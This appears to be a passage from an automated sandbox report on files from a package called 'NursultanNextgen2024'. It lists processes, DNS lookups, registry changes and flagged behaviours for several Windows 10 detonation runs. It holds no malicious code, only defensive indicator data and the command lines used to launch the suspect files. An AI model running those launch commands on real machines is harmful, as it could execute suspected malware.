| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\assets.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240611-en
Max time kernel
69s
Max time network
76s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\04\3d0cb49d33b9bb2462ad183f65e2e11aea3c1eff — копия (4) — копия"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
130s
Max time network
141s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\natives.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
130s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\glfw.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |